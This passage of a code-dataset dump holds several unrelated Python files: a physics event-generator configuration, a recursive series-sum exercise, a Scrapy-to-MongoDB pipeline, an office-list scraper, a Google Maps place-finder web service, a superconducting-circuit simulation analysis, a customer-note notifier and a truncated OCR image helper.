trials1 = experiment.create_trials('stimuli1_list_eng.csv')\n #pdb.set_trace()\n RT1 = experiment.running_experiment(trials1, testtype='test1')\n print(RT1)\n display_instructions(start_instruction='Test2',rt=RT1)\n if settings['Language']=='French':\n trials2 = experiment.create_trials('stimuli2_list_fr.csv')\n elif settings['Language']=='English':\n trials2 = experiment.create_trials('stimuli2_list_eng.csv')\n #pdb.set_trace()\n RT2 = experiment.running_experiment(trials2, testtype='test2')\n print(RT2)\n experiment.write_to_file(RT1,RT2)\n # End experiment but first we display some instructions\n display_instructions(start_instruction='End',rt=RT2)\n window.close()\n","sub_path":"stroopy_MG.py","file_name":"stroopy_MG.py","file_ext":"py","file_size_in_byte":11834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"114196373","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"MATCHINGZMUMU\")\n#keep the logging output to a nice level\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\n\n# MadGraph Interface\nprocess.load(\"GeneratorInterface.MadGraphInterface.MadGraphSourceDefault_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(-1)\n)\nprocess.RandomNumberGeneratorService = cms.Service(\"RandomNumberGeneratorService\",\n sourceSeed = cms.untracked.uint32(824177121)\n)\n\nprocess.out = cms.OutputModule(\"PoolOutputModule\",\n fileName = cms.untracked.string('MGtest.root')\n)\n\nprocess.p = cms.EndPath(process.out)\nprocess.MadGraphSource.fileNames = ['file:Zmumujets_xqcut20_qcut30_50K.lhe'] # rfcp /castor/cern.ch/user/d/dkcira/MadGraph/Samples/Zmumujets_xqcut20_qcut30_50K.lhe .\n# process.MadGraphSource.produceEventTreeFile = True # used for checking matching but should be turned off in production, it messes up the status of particles\nprocess.MadGraphSource.MEMAIN_etaclmax = 5.\nprocess.MadGraphSource.MEMAIN_qcut = 
30.\nprocess.MadGraphSource.MEMAIN_iexcfile = 0 # only set to 1 if need to perform exclusive matching\nprocess.MadGraphSource.PythiaParameters = cms.PSet(\n parameterSets = cms.vstring('pythiaMatching'),\n pythiaMatching = cms.vstring('PMAS(5,1)=4.4 ! b quarks mass', \n 'PMAS(6,1)=174.2! t quarks mass', \n 'MSTJ(1)=1 !...Fragmentation/hadronization on or off', \n 'MSTJ(11)=3 ! Choice of the fragmentation function', \n 'MSTJ(22)=2 ! Decay those unstable particles', \n 'PARJ(71)=10. ! for which ctau 10 mm', \n 'MSTP(2)=1 ! which order running alphaS', \n 'MSTP(33)=0 ! no K factors in hard cross sections', \n 'MSTP(51)=7 ! structure function chosen', \n 'MSTP(61)=1 ! Parton showering on or off', \n 'MSTP(71)=1 !', \n 'MSTP(81)=0 ! multiple parton interactions 1 is Pythia default', \n 'MSTP(82)=0 ! Defines the multi-parton model', \n 'MSTP(143)=1 ! MUST BE 1 FOR THE MATCHING ROUTINE TO RUN!!!!', \n 'MSTU(21)=1 ! Check on possible errors during program execution', \n 'PARP(82)=1.9 ! pt cutoff for multiparton interactions', \n 'PARP(89)=1000. ! sqrts for which PARP82 is set', \n 'PARP(83)=0.5 ! Multiple interactions: matter distrbn parameter', \n 'PARP(84)=0.4 ! Multiple interactions: matter distribution parameter', \n 'PARP(90)=0.16 ! Multiple interactions: rescaling power', \n 'PARP(67)=1. ! amount of initial-state radiation', \n 'PARP(85)=0.33 ! gluon prod. mechanism in MI', \n 'PARP(86)=0.66 ! gluon prod. mechanism in MI', \n 'PARP(87)=0.7 ! ', \n 'PARP(88)=0.5 ! ', \n 'PARP(91)=1.0 ! kt distribution', \n 'MSEL=0 ! 
User defined processes/Full user control')\n)\n\n\n","sub_path":"GeneratorInterface/MadGraphInterface/test/matchingZmumu_cfg.py","file_name":"matchingZmumu_cfg.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"87935448","text":"\"\"\"\n4.\tНайти сумму n элементов следующего ряда чисел: 1 -0.5 0.25 -0.125 ...\nКоличество элементов (n) вводится с клавиатуры.\n\nПример:\nВведите количество элементов: 3\nКоличество элементов: 3, их сумма: 0.75\n\nПодсказка:\nКаждый очередной элемент в 2 раза меньше предыдущего и имеет противоположный знак\n\nРешите через рекурсию. Решение через цикл не принимается.\nДля оценки Отлично в этом блоке необходимо выполнить 5 заданий из 7\n\"\"\"\n\n\ndef int_input(input_str) -> int:\n num = ''\n while num == '':\n try:\n num = input(input_str + '\\n')\n num = int(num)\n except ValueError:\n print('введено не число')\n return num\n\n\ndef sum_of_row(iterator, el=1.0):\n return el if iterator == 0 else el + sum_of_row(iterator - 1, el * -0.5)\n\n\nif __name__ == '__main__':\n n = int_input('введите число')\n print(f'сумма: {sum_of_row(n-1)}')\n","sub_path":"Урок 2. 
Практическое задание/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"571310965","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport datetime\nfrom pymongo import *\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nclass IpProxyPipeline(object):\n\n mongoClient = None\n\n def __init__(self,host,port):\n logging.debug(\"Open Mongo %s:%d\" % (host,port))\n self.mongoClient= MongoClient(host,port)\n\n def process_item(self, item, spider):\n db = self.mongoClient[\"ip_proxy\"][\"nature_proxy\"]\n item[\"last_update\"] = datetime.datetime.now()\n logging.debug(\"insert One\")\n db.update_one({\"update_at\": item[\"last_update\"]}, {\"$set\": dict(item)}, upsert=True)\n\n # return item\n\n def close_spider(self, spider):\n logging.debug(\"Close Mongo\")\n self.mongoClient.close()\n\n\n @classmethod\n def from_crawler(cls, crawler):\n settings = crawler.settings\n\n logging.debug(\"Connect Mongo\")\n\n return cls(settings[\"MONGO_HOST\"], settings[\"MONGO_PORT\"])\n","sub_path":"codes/ip_proxy/ip_proxy/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"138160257","text":"import requests\n\nimport json\nimport os\n\n\nresponse = requests.get(\"https://www.tui.ru/api/office/cities/\")\njson_list=[]\nfor city in response.json():\n ofice_response= requests.get(\"https://www.tui.ru/api/office/list/?cityId={}\".format(city['cityId']))\n for ofice in ofice_response.json():\n workdays=ofice['hoursOfOperation']['workdays']\n saturday=ofice['hoursOfOperation']['saturday']\n sunday=ofice['hoursOfOperation']['sunday']\n\n weekend = 'cб {}-{} вс {} - {}'.format(saturday['start'][:-3], 
saturday['end'][:-3], sunday['start'][:-3], sunday['end'][:-3])\n hours=['пн-пт {}-{}'.format(workdays['start'][:-3], workdays['end'][:-3]),\n weekend\n ]\n json_dict={\n 'adress': ofice['address'],\n 'latlon' : [ofice['latitude'], ofice['longitude'] ],\n \"name\": ofice['name'],\n \"phones\": [ phone['phone'] for phone in ofice['phones']],\n \"working_hours\": hours\n }\n json_list.append(json_dict)\n\nget_path = os.path.dirname(__file__)\npath = os.path.join(get_path, 'json2.json',)\nwith open(path, 'w') as wf:\n json.dump(json_list, wf, ensure_ascii=False, indent=4)\n\n\n\n\n\n\n\n\n\n# response = requests.get(\"https://www.tui.ru/api/office/cities/\")\n#\n# print(response.text)\n# print(len(response.text))","sub_path":"script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"387857228","text":"import json\nimport falcon\nimport googlemaps\nfrom wsgiref import simple_server\nfrom math import sin, cos, sqrt, atan2, radians\n\n# Create Falcon API instance\napi = falcon.API()\n\nclass GasStation(object):\n\n def on_get(self, req, resp):\n # Insert personal API key\n gmaps = googlemaps.Client(key='Your API key here')\n input = req.params\n\n # Read parameters provided in a link to the server\n try:\n\n # Retrieving Geolocation from link address\n lat = float(input['lat'])\n lng = float(input['lng'])\n mylocation = {'lat': lat, 'lng': lng,}\n\n # Retrieving destination from link address\n if input['destination'] == 'gas_station':\n output = Distance().find_address(gmaps, mylocation, \"gas station\")\n elif input['destination'] == 'starbucks':\n output = Distance().find_address(gmaps, mylocation, \"starbucks\")\n elif input['destination'] == 'dunkin':\n output = Distance().find_address(gmaps, mylocation, \"dunkin donats\")\n elif req.content_length == 0:\n raise falcon.HTTPBadRequest(\"Incorrect parameters\",\n \"Provide correct parameters\")\n 
except:\n raise falcon.HTTPBadRequest( \"Incorrect parameters\",\n \"Provide correct parameters\")\n\n\n # Get provided parameters\n resp.body = json.dumps(output)\n\n resp.status = falcon.HTTP_200\n\n def on_post(self, req, resp):\n\n output = {'request': 'Incorrect'}\n\n resp.body = json.dumps(output)\n\n resp.status = falcon.HTTP_200\n\n\n# Approximate radius of earth in km\nR = 6373.0\nMILES_IN_KM: float = 0.621371\n\nclass Distance(object):\n\n \"\"\" Input: Dict with geolocation point\n Output: Distance between two points \"\"\"\n def find_distance(self, from_, to_):\n\n # Retrieve values from dictionary to variables\n lat1 = from_['lat']\n lon1 = from_['lng']\n lat2 = to_['lat']\n lon2 = to_['lng']\n\n # Calculate distance using geolocation of two points\n dlon = radians(lon2 - lon1)\n dlat = radians(lat2 - lat1)\n\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n\n distance_ = (R * c) * MILES_IN_KM\n\n return round(distance_,2)\n\n \"\"\" Input: Dictance between two points\n Output: Address of destination \"\"\"\n def find_address(self, _gmaps, _from, _to):\n # Find closest building that you are looking for\n search_for_place = _gmaps.places(query=_to, location=_from, )\n results = search_for_place['results']\n\n # Find distance in miles between you and destination point\n dist = Distance()\n distance_ = dist.find_distance(_from, results[0]['geometry']['location'])\n\n # Data preparation for output as a JSON file\n output = {'address': results[0]['formatted_address'],\n 'distance': distance_,\n 'name': results[0]['name']}\n return output\n\n# Create an instance of gas station class in order to produce a response\ngas_station = GasStation()\n\napi.add_route('/key', gas_station)\n\nif __name__ == '__main__':\n httpd = simple_server.make_server('127.0.0.1', 8000, api)\n 
httpd.serve_forever()\n","sub_path":"maps_tokar/fullmain.py","file_name":"fullmain.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"470567957","text":"#%%\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport time\nfrom scipy.signal import find_peaks\nfrom scipy.optimize import curve_fit\n\n# from soen_sim import input_signal, synapse, dendrite, neuron\nfrom _plotting import plot_fq_peaks, plot_fq_peaks__dt_vs_bias, plot_wr_data__currents_and_voltages\nfrom _functions import read_wr_data, V_fq__fit, inter_fluxon_interval__fit, inter_fluxon_interval, inter_fluxon_interval__fit_2, inter_fluxon_interval__fit_3\nfrom util import physical_constants\np = physical_constants()\n\nplt.close('all')\n\n#%% load wr data\nread_wr = True\nif read_wr == True:\n directory = 'wrspice_data'\n file_name = 'dend_lin_ramp_Idrv18.0-30.0uA_Ldi0077.50nH_taudi00775ms_tsim43ns_dt00.1ps.dat'\n data_dict = read_wr_data(directory+'/'+file_name)\n data_dict['file_name'] = file_name\n\n#%% plot wr data\ndata_to_plot = ['L4#branch','L3#branch','v(3)','v(4)','v(5)']#'L0#branch','L1#branch','L2#branch',\nplot_save_string = False\nplot_wr_data__currents_and_voltages(data_dict,data_to_plot,plot_save_string)\n\n#%% find peaks for each jj\ntime_vec = data_dict['time']\nj_df = data_dict['v(3)']\nj_jtl = data_dict['v(4)']\nj_di = data_dict['v(5)']\n\ninitial_ind = (np.abs(time_vec-2.0e-9)).argmin()\nfinal_ind = (np.abs(time_vec-42e-9)).argmin()\n\ntime_vec = time_vec[initial_ind:final_ind]\nj_df = j_df[initial_ind:final_ind]\nj_jtl = j_jtl[initial_ind:final_ind]\nj_di = j_di[initial_ind:final_ind]\n\n# fig, ax = plt.subplots(nrows = 1, ncols = 1, sharex = True, sharey = False) \n# ax.plot(time_vec*1e9,j_df*1e3, '-', ) \n# ax.set_xlabel(r'Time [ns]')\n# ax.set_ylabel(r'Voltage [mV]')\n# plt.show()\n \nj_df_peaks, _ = find_peaks(j_df, height = [140e-6,175e-6])\nj_jtl_peaks, _ = find_peaks(j_jtl, 
height = 200e-6)\nj_di_peaks, _ = find_peaks(j_di, height = 200e-6)\n\n# fig, ax = plt.subplots(nrows = 1, ncols = 1, sharex = True, sharey = False) \n# ax.plot(time_vec*1e9,j_df*1e3, '-', label = 'data') \n# ax.plot(time_vec[j_df_peaks]*1e9,j_df[j_df_peaks]*1e3, 'x', label = 'peaks')\n# ax.set_xlabel(r'Time [ns]')\n# ax.set_ylabel(r'Voltage [mV]')\n# ax.legend()\n# plt.show()\n\nfig, ax = plt.subplots(nrows = 3, ncols = 1, sharex = True, sharey = False)\nfig.suptitle(file_name) \nax[0].plot(time_vec*1e9,j_df*1e3, '-', label = '$J_{df}$') \nax[0].plot(time_vec[j_df_peaks]*1e9,j_df[j_df_peaks]*1e3, 'x')\nax[0].set_xlabel(r'Time [ns]')\nax[0].set_ylabel(r'Voltage [mV]')\nax[0].legend()\nax[1].plot(time_vec*1e9,j_jtl*1e3, '-', label = '$J_{jtl}$') \nax[1].plot(time_vec[j_jtl_peaks]*1e9,j_jtl[j_jtl_peaks]*1e3, 'x')\nax[1].set_xlabel(r'Time [ns]')\nax[1].set_ylabel(r'Voltage [mV]')\nax[1].legend()\nax[2].plot(time_vec*1e9,j_di*1e3, '-', label = '$J_{di}$') \nax[2].plot(time_vec[j_di_peaks]*1e9,j_di[j_di_peaks]*1e3, 'x')\nax[2].set_xlabel(r'Time [ns]')\nax[2].set_ylabel(r'Voltage [mV]')\nax[2].legend()\nplt.show()\n\n#%% find inter-fluxon intervals and fluxon generation rates for each JJ\n\nI_di = data_dict['L3#branch']\nI_di = I_di[initial_ind:final_ind]\nI_drive = data_dict['L4#branch']\nI_drive = I_drive[initial_ind:final_ind]\n\nj_df_ifi = np.diff(time_vec[j_df_peaks])\nj_jtl_ifi = np.diff(time_vec[j_jtl_peaks])\nj_di_ifi = np.diff(time_vec[j_di_peaks])\n\nj_df_rate = 1/j_df_ifi\nj_jtl_rate = 1/j_jtl_ifi\nj_di_rate = 1/j_di_ifi\n\nfig, ax = plt.subplots(nrows = 1, ncols = 1, sharex = True, sharey = False) \nfig.suptitle(file_name)\nax.plot(time_vec*1e9,I_drive*1e6, '-', label = '$I_{drive}$') \nax.plot(time_vec*1e9,I_di*1e6, '-', label = '$I_{di}$') \nax.set_xlabel(r'Time [ns]')\nax.set_ylabel(r'Current [$\\mu$A]')\nax.legend()\nplt.show()\n\nfig, ax = plt.subplots(nrows = 2, ncols = 3, sharex = False, sharey = False) \nfig.suptitle(file_name) 
\n\nax[0,0].plot(time_vec[j_df_peaks[0:-1]]*1e9,j_df_ifi*1e12, '-', label = '$J_{df}$ IFI') \nax[0,0].plot(time_vec[j_jtl_peaks[0:-1]]*1e9,j_jtl_ifi*1e12, '-', label = '$J_{jtl}$ IFI') \nax[0,0].plot(time_vec[j_di_peaks[0:-1]]*1e9,j_di_ifi*1e12, '-', label = '$J_{di}$ IFI') \nax[0,0].set_xlabel(r'Time [ns]')\nax[0,0].set_ylabel(r'Inter-fluxon interval [ps]')\nax[0,0].legend()\n \nax[0,1].plot(I_drive[j_df_peaks[0:-1]]*1e6,j_df_ifi*1e12, '-', label = '$J_{df}$ IFI') \nax[0,1].plot(I_drive[j_jtl_peaks[0:-1]]*1e6,j_jtl_ifi*1e12, '-', label = '$J_{jtl}$ IFI') \nax[0,1].plot(I_drive[j_di_peaks[0:-1]]*1e6,j_di_ifi*1e12, '-', label = '$J_{di}$ IFI') \nax[0,1].set_xlabel(r'$I_{drive}$ [$\\mu$A]')\nax[0,1].legend()\n \nax[0,2].plot(I_di[j_df_peaks[0:-1]]*1e6,j_df_ifi*1e12, '-', label = '$J_{df}$ IFI') \nax[0,2].plot(I_di[j_jtl_peaks[0:-1]]*1e6,j_jtl_ifi*1e12, '-', label = '$J_{jtl}$ IFI') \nax[0,2].plot(I_di[j_di_peaks[0:-1]]*1e6,j_di_ifi*1e12, '-', label = '$J_{di}$ IFI') \nax[0,2].set_xlabel(r'$I_{di}$ [$\\mu$A]')\nax[0,2].legend()\nax[0,2].set_title(file_name)\n\n \nax[1,0].plot(time_vec[j_df_peaks[0:-1]]*1e9,j_df_rate*1e-9, '-', label = '$J_{df}$ rate') \nax[1,0].plot(time_vec[j_jtl_peaks[0:-1]]*1e9,j_jtl_rate*1e-9, '-', label = '$J_{jtl}$ rate') \nax[1,0].plot(time_vec[j_di_peaks[0:-1]]*1e9,j_di_rate*1e-9, '-', label = '$J_{di}$ rate') \nax[1,0].set_xlabel(r'Time [ns]')\nax[1,0].set_ylabel(r'Fluxon generation rate [GHz]')\nax[1,0].legend()\n \nax[1,1].plot(I_drive[j_df_peaks[0:-1]]*1e6,j_df_rate*1e-9, '-', label = '$J_{df}$ rate') \nax[1,1].plot(I_drive[j_jtl_peaks[0:-1]]*1e6,j_jtl_rate*1e-9, '-', label = '$J_{jtl}$ rate') \nax[1,1].plot(I_drive[j_di_peaks[0:-1]]*1e6,j_di_rate*1e-9, '-', label = '$J_{di}$ rate') \nax[1,1].set_xlabel(r'$I_{drive}$ [$\\mu$A]')\nax[1,1].legend()\n\nax[1,2].plot(I_di[j_df_peaks[0:-1]]*1e6,j_df_rate*1e-9, '-', label = '$J_{df}$ rate') \nax[1,2].plot(I_di[j_jtl_peaks[0:-1]]*1e6,j_jtl_rate*1e-9, '-', label = '$J_{jtl}$ rate') 
\nax[1,2].plot(I_di[j_di_peaks[0:-1]]*1e6,j_di_rate*1e-9, '-', label = '$J_{di}$ rate') \nax[1,2].set_xlabel(r'$I_{di}$ [$\\mu$A]')\nax[1,2].legend()\n\n\n \n# fig, ax = plt.subplots(1,1)\n# error = ax.imshow(np.log10(np.transpose(error_mat[:,:])), cmap = plt.cm.viridis, interpolation='none', extent=[vec1[0],vec1[-1],vec2[0],vec2[-1]], aspect = 'auto', origin = 'lower')\n# cbar = fig.colorbar(error, extend='both')\n# cbar.minorticks_on() \n# fig.suptitle('log10(Error) versus {} and {}'.format(x_label,y_label))\n# plt.title(title_string)\n# ax.set_xlabel(r'{}'.format(x_label))\n# ax.set_ylabel(r'{}'.format(y_label)) \n# plt.show() \n# fig.savefig('figures/'+save_str+'__log.png') \n\n#%% find delay between junctions\n\ndelay_df_jtl = np.zeros([len(j_jtl_peaks)])\ndelay_jtl_di = np.zeros([len(j_di_peaks)])\ndelay_di_df = np.zeros([len(j_di_peaks)])\n\nfor ii in range(len(j_jtl_peaks)):\n delay_df_jtl[ii] = time_vec[j_jtl_peaks[ii]]-time_vec[j_df_peaks[ii]]\nfor ii in range(len(j_di_peaks)):\n delay_jtl_di[ii] = time_vec[j_di_peaks[ii]]-time_vec[j_jtl_peaks[ii]]\nfor ii in range(len(j_di_peaks)):\n delay_di_df[ii] = time_vec[j_df_peaks[ii+1]]-time_vec[j_di_peaks[ii]]\n\n\nfig, ax = plt.subplots(nrows = 1, ncols = 3, sharex = False, sharey = True)\nfig.suptitle(file_name)\n\nax[0].plot(time_vec[j_jtl_peaks]*1e9,delay_df_jtl*1e12, '-', label = '$\\Delta t_{jtl-df}$') \nax[0].plot(time_vec[j_di_peaks]*1e9,delay_jtl_di*1e12, '-', label = '$\\Delta t_{di-jtl}$')\nax[0].plot(time_vec[j_di_peaks]*1e9,delay_di_df*1e12, '-', label = '$\\Delta t_{di-df}$')\nax[0].set_xlabel(r'Time [ns]')\nax[0].set_ylabel(r'Delay between fluxons from adjacent JJs [ps]')\nax[0].legend()\n\nax[1].plot(I_drive[j_jtl_peaks]*1e6,delay_df_jtl*1e12, '-', label = '$\\Delta t_{jtl-df}$') \nax[1].plot(I_drive[j_di_peaks]*1e6,delay_jtl_di*1e12, '-', label = '$\\Delta t_{di-jtl}$')\nax[1].plot(I_drive[j_di_peaks]*1e6,delay_di_df*1e12, '-', label = '$\\Delta t_{di-df}$')\nax[1].set_xlabel(r'$I_{drive}$ 
[$\\mu$A]')\nax[1].legend()\n\nax[2].plot(I_di[j_jtl_peaks]*1e6,delay_df_jtl*1e12, '-', label = '$\\Delta t_{jtl-df}$') \nax[2].plot(I_di[j_di_peaks]*1e6,delay_jtl_di*1e12, '-', label = '$\\Delta t_{di-jtl}$')\nax[2].plot(I_di[j_di_peaks]*1e6,delay_di_df*1e12, '-', label = '$\\Delta t_{di-df}$')\nax[2].set_xlabel(r'$I_{di}$ [$\\mu$A]')\nax[2].legend()\n\nplt.show()\n\n#%% fit total delay to functional form\n\n# popt, pcov = curve_fit(inter_fluxon_interval__fit_2, I_di[j_df_peaks[0:-1]], j_df_ifi, p0 = [50e-12,19e-6,2.8,0.5,105e-6], bounds = ([10e-12,10e-6, 0, 0, 10e-6], [100e-12,30e-6, 3., 1., 200e-6]))\n\n# fig, ax = plt.subplots(nrows = 1, ncols = 1, sharex = True, sharey = False) \n# ax.plot(I_di[j_df_peaks[0:-1]]*1e6,j_df_ifi*1e12, '-', label = 'WR') \n# ax.plot(I_di*1e6,inter_fluxon_interval__fit_2(I_di,*popt)*1e12, '-', label = 'Fit: t0 = {:3.2f}ps, $I_f$ = {:2.2f}uA, mu1 = {:1.3f}, mu2 = {:1.3f}, V0 = {:3.3f}uV'.format(popt[0]*1e12,popt[1]*1e6,popt[2],popt[3],popt[4]*1e6)) \n# ax.set_xlabel(r'Current [$\\mu$A]')\n# ax.set_ylabel(r'Inter-fluxon interval [ps]')\n# ax.legend()\n# ax.set_ylim([0,200])\n# plt.show()\n\n# popt, pcov = curve_fit(inter_fluxon_interval__fit_3, I_di[j_df_peaks[0:-1]], j_df_ifi, bounds = ([40.1e-6,40.1e-6], [70e-6,70e-6]))\n\n# fig, ax = plt.subplots(nrows = 1, ncols = 1, sharex = True, sharey = False) \n# ax.plot(I_di[j_df_peaks[0:-1]]*1e6,j_df_ifi*1e12, '-', label = 'WR') \n# ax.plot(I_di*1e6,inter_fluxon_interval__fit_3(I_di,*popt)*1e12, '-', label = 'Fit: I_bar_1 = {:2.4f}uA, I_bar_2 = {:2.4f}uA'.format(popt[0]*1e6,popt[1]*1e6)) \n# ax.set_xlabel(r'Current [$\\mu$A]')\n# ax.set_ylabel(r'Inter-fluxon interval [ps]')\n# ax.legend()\n# ax.set_ylim([0,200])\n# plt.show()\n\n#%%\n# abcde = inter_fluxon_interval__fit_3(I_di,*popt)*1e12 \n\n#%% fit inter-fluxon interval versus current bias\n\n# plt.close('all')\n\n# inter_fluxon_interval = np.diff(time_vec__part[fluxon_peaks])\n\n# # popt, pcov = curve_fit(inter_fluxon_interval__fit, 
current_vec__part[fluxon_peaks[0:-1]], inter_fluxon_interval, bounds = ([0, 0, 0], [3., 1., 200e-6]))\n\n# fig, ax = plt.subplots(nrows = 1, ncols = 1, sharex = True, sharey = False) \n# ax.plot(current_vec__part[fluxon_peaks[0:-1]]*1e6,inter_fluxon_interval*1e12, '-', label = 'WR') \n# # ax.plot(current_vec__part[fluxon_peaks[0:-1]]*1e6,inter_fluxon_interval__fit(current_vec__part[fluxon_peaks[0:-1]],2.8,0.58,100e-6)*1e12, '-', label = 'Fit: mu1 = {:1.3f}, mu2 = {:1.3f}, V0 = {:3.3f}uV'.format(2.8,0.58,100e-6*1e6)) \n# ax.plot(current_vec__part[fluxon_peaks[0:-1]]*1e6,inter_fluxon_interval__fit(current_vec__part[fluxon_peaks[0:-1]],*popt)*1e12, '-', label = 'Fit: mu1 = {:1.3f}, mu2 = {:1.3f}, V0 = {:3.3f}uV'.format(popt[0],popt[1],popt[2]*1e6)) \n# ax.set_xlabel(r'Current [$\\mu$A]')\n# ax.set_ylabel(r'Inter-fluxon Interval [ps]')\n# ax.legend()\n# plt.show()\n\n# fig, ax = plt.subplots(nrows = 1, ncols = 1, sharex = True, sharey = False) \n# ax.plot(current_vec__part[fluxon_peaks[0:-1]]*1e6,1/inter_fluxon_interval*1e-9, '-', label = 'WR') \n# # ax.plot(current_vec__part[fluxon_peaks[0:-1]]*1e6,inter_fluxon_interval__fit(current_vec__part[fluxon_peaks[0:-1]],2.8,0.58,100e-6)*1e12, '-', label = 'Fit: mu1 = {:1.3f}, mu2 = {:1.3f}, V0 = {:3.3f}uV'.format(2.8,0.58,100e-6*1e6)) \n# ax.plot(current_vec__part[fluxon_peaks[0:-1]]*1e6,1/inter_fluxon_interval__fit(current_vec__part[fluxon_peaks[0:-1]],*popt)*1e-9, '-', label = 'Fit: mu1 = {:1.3f}, mu2 = {:1.3f}, V0 = {:3.3f}uV'.format(popt[0],popt[1],popt[2]*1e6)) \n# ax.set_xlabel(r'Current [$\\mu$A]')\n# ax.set_ylabel(r'Fluxon Generation Rate [GHz]')\n# ax.legend()\n# plt.show()\n\n#%%\n# xqp = inter_fluxon_interval(40e-6)","sub_path":"dendrite/_bak/s__t_fq_vs_I_flux_and_I_di.py","file_name":"s__t_fq_vs_I_flux_and_I_di.py","file_ext":"py","file_size_in_byte":11597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"212594357","text":"@staticmethod\ndef 
transcribe_object(app_entry_identifier=None, user_identifier=None, content=None, blob_count=0, n_key=\"n/a\"):\n \"\"\"Add a message by txt string.\"\"\"\n if app_entry_identifier is None:\n logging.error(\"A FieldApplicationEntry identifier is required to post a message\")\n return None\n if user_identifier is None:\n logging.error(\"A user identifier is required to post a message\")\n return None\n if content is None:\n logging.error(\"No message object given to post a message\")\n return None\n\n note_id = Helpers.guid()\n try:\n note = CustomerNote(\n identifier=note_id,\n field_app_identifier=app_entry_identifier,\n inserted_pacific=Helpers.pacific_now(),\n inserted_utc=datetime.now(),\n author=user_identifier,\n perms=\"public\",\n content=json.dumps(content),\n blob_count=blob_count,\n note_key=n_key,\n read=False\n )\n designee = note.get_designee()\n note.read = ((designee == note.author) or (designee is None))\n note.put()\n\n if (not note.read) and (not designee is None):\n f = GCSLockedFile(\"/ApplicationSettings/UserSettings/Notifications/\" + designee + \".json\")\n content = f.read()\n if not content is None:\n settings = json.loads(content)\n if \"new_customer_note\" in settings.keys():\n if settings[\"new_customer_note\"][\"sms\"] == True:\n try:\n app_entry = FieldApplicationEntry.first(FieldApplicationEntry.identifier == app_entry_identifier)\n rep = FieldApplicationUser.first(FieldApplicationUser.identifier == designee)\n if (not app_entry is None) and (not designee is None):\n msg = \"a new note for one of your customers (\" + app_entry.customer_first_name.strip() + \" \" + app_entry.customer_last_name.strip() + \") got recorded in the field app.\"\n Helpers.send_sms(rep.rep_phone, msg)\n except:\n logging.error(\"SMS failed\")\n if settings[\"new_customer_note\"][\"email\"] == True:\n try:\n msg2 = rep.first_name.strip() + \" \" + rep.last_name.strip() + \",\\n\\nA new note for \" + app_entry.customer_first_name.strip() + \" \" + 
app_entry.customer_last_name.strip() + \" was recorded:\\n\\n\\\"\" + note.content + \"\\\"\"\n Helpers.send_email(rep.rep_email, \"New Customer Note!\", msg2)\n except:\n logging.error(\"Customer note notification failed\")\n\n except:\n exctype, value = sys.exc_info()[:2]\n logging.error(\"note put error({0}): {1} while putting jsonObject\".format(exctype, value))\n note_id = None\n\n return note_id\n\n","sub_path":"classes/CustomerTranscriber_/transcribe_object.py","file_name":"transcribe_object.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"564272217","text":"import logging\n\nfrom io import BytesIO\nfrom statistics import median, StatisticsError\n\nimport cv2\nimport numpy as np\nimport pillowfight\nimport pytesseract as ocr\nfrom PIL import Image, ImageEnhance\nfrom textdetect import TextDetect\n\nlogger = logging.Logger('IQ: OCR: IMAGE')\n\n\nclass OCRImage:\n _img: any\n\n def __init__(self, data):\n self.set_image_from_bytes(data)\n\n def get_cv2(self):\n return self._img\n\n def get_image(self):\n self._img = cv2.cvtColor(self._img, cv2.COLOR_BGR2RGB)\n img = Image.fromarray(self._img)\n return img\n\n def size_down_image(self):\n height, width = self._img.shape[:2]\n max_height = 1280\n ratio = 1\n if height > max_height:\n ratio = max_height / height\n self._img = self.scale_image(ratio)\n height, width = self._img.shape[:2]\n max_width = 1280\n if width > max_width:\n ratio = max_width / width\n self._img = self.scale_image(ratio)\n return ratio\n\n def deskew(self):\n angle = self.get_image_angle()\n logger.debug(f\"angle {angle}\")\n self.rotate_image(angle)\n return angle\n\n def get_image_angle(self):\n gray = cv2.cvtColor(self._img, cv2.COLOR_BGR2GRAY)\n gray = cv2.bitwise_not(gray)\n thresh = cv2.threshold(\n gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n coords = np.column_stack(np.where(thresh > 0))\n angle = 
cv2.minAreaRect(coords)[-1]\n if angle < -45:\n angle = -(90 + angle)\n else:\n angle = -angle\n return angle\n\n def scale_image(self, scale=0.25):\n print(scale)\n print(self._img.shape)\n height, width = self._img.shape[:2]\n print('height: ' + str(height))\n print('width: ' + str(width))\n self._img = cv2.resize(self._img, None, fx=scale, fy=scale)\n height, width = self._img.shape[:2]\n print('new height: ' + str(height))\n print('new width: ' + str(width))\n\n return self._img\n\n def rotate_image(self, angle):\n # get the height and width of the original image\n (h, w) = self._img.shape[:2]\n # get the center of the image to calculate rotation matrix\n center = (w // 2, h // 2)\n # calculate the rotation matrix\n m = cv2.getRotationMatrix2D(center, angle, 1.0)\n print('angle: ' + str(angle))\n # rotate the image\n self._img = cv2.warpAffine(\n self._img, m, 